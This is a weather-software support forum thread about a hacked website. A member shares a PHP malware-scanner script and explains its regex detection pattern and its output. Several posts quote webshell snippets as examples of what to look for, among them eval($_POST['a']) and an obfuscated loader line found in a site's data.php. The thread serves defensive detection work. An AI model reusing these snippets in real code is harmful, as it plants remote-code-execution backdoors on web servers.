Welcome to the Cumulus Support forum.

Latest Cumulus MX release 3.11.4 (build 3133) - 25 May 2021 (please see announcement regarding releases since 3.5.0)
Legacy Cumulus 1 release v1.9.4 (build 1099) - 28 November 2014 (a patch is available for 1.9.4 build 1099 that extends the date range of drop-down menus to 2030)

Download the Software (Cumulus MX / Cumulus 1 and other related items) from the Wiki

Website hacked

Other discussion about creating web sites for Cumulus that doesn't have a specific subforum

Moderator: daj

User avatar
rogerthn
Posts: 339
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS Lite Buster
Location: Trollhättan Sweden
Contact:

Re: Website hacked

Post by rogerthn »

saratogaWX wrote:
Fri 30 Apr 2021 9:30 pm
I've sent a PM with a link to a tool I developed to spot malware on PHP sites.

Best regards,
Ken

p.s. I've used this to help disinfect about 10 sites for folks so far.
May I please also have that link?
Image

User avatar
saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

Sure.. PM sent.

water01
Posts: 2164
Joined: Sat 13 Aug 2011 9:33 am
Weather Station: WH1081
Operating System: Windows 10 64bit
Location: Burnham-on-Sea
Contact:

Re: Website hacked

Post by water01 »

Could I also have It? Or perhaps we can make it part of the Wiki?
David
Image

User avatar
saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

Sure, I guess it's not really a secret.

https://saratoga-weather.org/chk-files.php?sce=view

Place in the document root of your website. It will scan all .php and .htaccess files looking for possibly malicious content.

It will flag (based on a regex) things that look like constructed functions $functionname(), exec(), system(), eval(), base64_decode(), $_POST usage. It can flag harmless instances too, so it's important to sanity check the output.. there can be a lot of false-positives.

User avatar
rogerthn
Posts: 339
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS Lite Buster
Location: Trollhättan Sweden
Contact:

Re: Website hacked

Post by rogerthn »

Thanks!
Is this what to look for

Code: Select all

5 instances of ....
Image

User avatar
saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

That just shows the count of 'hits' that the regex found that deserve looking at.

Each 'hit' is shown above with the matching part in red. You have to examine it and determine if it's possibly malicious.

Things that look like
eval($_POST['a']) or
eval(bin64_decode($_POST['a']))
are obviously bad.
As is something like
./data.php Created=20-Dec-2020 14:47:46 GMT Modified=20-Dec-2020 14:47:46 GMT size=184 bytes.
3 (count($b) == 8)?(($ij = $b[58].$b[88]) && ($qc = $ij($b[23].$b[42])) && ($_qc = $ij($b[65].$b[27])) && ($_qc = $qc($b[95], $_qc($ij($b[22])))) && @$_qc()) : $b;
(the $variable() functions are a give away that something untoward is happening)

Sometimes, a flagged entry happens inside a comment (// or # or /*...*/) so looks bad, but is not really executed, and so not harmful.

That's why, the results found by the script have to be sanity checked as the filter is cast quite wide.

User avatar
PaulMy
Posts: 2668
Joined: Sun 28 Sep 2008 11:54 pm
Weather Station: Davis VP2+ Cumulus1 / CummulusMX
Operating System: Windows8 / Windows10
Location: Komoka, ON Canada
Contact:

Re: Website hacked

Post by PaulMy »

Hi Ken,
I have run the script but not sure what to make of the results:

Code: Select all

Match pattern used is '/(.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\()/i'

   ./saratoga-malwarescanner3.php Created=02-May-2021 19:25:14 GMT Modified=02-May-2021 19:25:14 GMT size=7426 bytes.
28	  $toFind = '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(';
   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
   ./jpgraph/jpgraph_legend.inc.php Created=22-Mar-2021 02:35:43 GMT Modified=22-Mar-2021 02:35:43 GMT size=18105 bytes.
212	  //echo "h=$h ({$this->mark_abs_vsize},{$this->ymargin})<br />";
7 instances of '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(' found in 3 '.php;.htaccess;' files using 2.985 secs.
I have compared the two files in DiffMerge and the website files are identical to the files in the template download unzipped files, so appears no changes made to the files while on the webserver.

Should I be concerned or need to take any action?

Thanks,
Paul

User avatar
saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

So, of the one's displayed, only

Code: Select all

   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
caught my eye. You should take a look in jpgraph_utils.inc.php for how $t is set by the code. If it comes from an argument ($_GET/$_POST/$_REQUEST) directly without 'sanitation', then it's a big problem. If $t is constructed without using any of the above, it's likely benign.

Post Reply